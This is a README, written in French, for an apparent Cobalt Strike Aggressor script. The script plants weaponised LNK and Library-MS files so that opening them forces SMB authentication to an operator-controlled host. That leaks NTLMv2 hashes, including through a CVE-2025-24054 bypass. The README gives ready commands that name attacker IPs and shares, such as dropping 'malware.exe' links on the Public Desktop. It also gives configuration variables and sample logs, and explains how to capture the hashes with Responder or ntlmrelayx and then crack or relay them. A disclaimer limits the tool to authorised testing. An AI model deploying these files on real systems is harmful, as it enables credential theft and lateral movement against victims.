
# Script Aggressor Cobalt Strike qui arme des fichiers LNK et Library-MS pour déclencher la divulgation de hachages SMB NTLMv2, incluant le contournement CVE-2025-24054, pour des opérations de red team autorisées.
Un script Aggressor complet pour Cobalt Strike qui weaponise et exécute des fichiers LNK malveillants et des fichiers Library-MS pour la divulgation de hachage NTLMv2-SSP SMB. Inclut les techniques de contournement CVE-2025-24054.
Cet outil est destiné uniquement à des fins éducatives et de recherche. L'auteur décline toute responsabilité en cas d'utilisation abusive de ce code. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.
Ce script génère des fichiers .lnk et .library-ms weaponisés qui déclenchent une authentification SMB vers l'hôte de l'opérateur lorsqu'ils sont ouverts.
Les hachages NTLMv2 divulgués ne sont pas affichés dans Cobalt Strike, mais doivent être capturés avec des outils externes tels que Responder, ntlmrelayx.py d'Impacket ou Inveigh exécutés sur le système attaquant.
Une fois collectés, les hachages peuvent être crackés avec Hashcat ou relayés pour un mouvement latéral supplémentaire.
cobalt-strike-aggressor/
├── lnk_weaponizer.cna # Script Aggressor principal (v2.0)
├── standalone_lnk_weaponizer.ps1 # Version PowerShell autonome
├── README.md # Cette documentation
├── INSTALL.md # Guide d'installation et de configuration
└── examples/
├── usage_scenarios.md # Exemples d'utilisation pratiques
└── sample_targets.csv # Fichier d'opérations par lots exemple
lnk_weaponizer.cna dans votre répertoire de scripts Aggressor de Cobalt StrikeCobalt Strike → Script ManagerLoad et sélectionnez lnk_weaponizer.cnaFaites un clic droit sur n'importe quel beacon dans Cobalt Strike pour accéder à :
# Créer un fichier LNK avec des paramètres personnalisés
lnk_create <chemin> <ip> <partage> <fichier>
# Exemple
lnk_create C:\Temp 192.168.1.10 share payload.exe
# Créer un fichier Library-MS avec des paramètres personnalisés
library_create <chemin> <ip> <partage>
# Exemple
library_create C:\Temp 10.10.14.22 share
# Utiliser les paramètres par défaut
lnk_quick
library_quick
# Afficher l'aide
lnk_help
Le script utilise ces valeurs par défaut configurables :
192.168.1.10shareC:\TempModifiez les variables globales dans lnk_weaponizer.cna :
global('$default_ip $default_share $default_path');
$default_ip = "192.168.1.10";
$default_share = "share";
$default_path = "C:\\Temp";
.library-ms dans le répertoire cibleLes deux techniques créent des fichiers qui :
Le script fournit une journalisation détaillée :
[+] Création du fichier LNK sur TARGET-COMPUTER
[+] Cible UNC : \\192.168.1.10\share\payload.exe
[+] Chemin local : C:\Temp
[+] Weaponisation LNK terminée
[!] Attendez que l'utilisateur clique sur le fichier LNK pour capturer le hachage NTLM
Beacon non trouvé
Permission refusée
Stratégie d'exécution PowerShell
bpowershell() pour gérer les restrictionsActivez la sortie verbose en modifiant le script :
# Ajouter une journalisation de débogage
blog($bid, "[DEBUG] Exécution de la commande : " . $command);
# Créer un fichier LNK sur une cible spécifique
lnk_create C:\Users\Public\Desktop 10.0.0.5 public malware.exe
# Créer un fichier Library-MS pour le contournement CVE-2025-24054
library_create C:\Users\Public\Desktop 192.168.1.100 share
# Utiliser les paramètres par défaut pour un déploiement rapide
lnk_quick
library_quick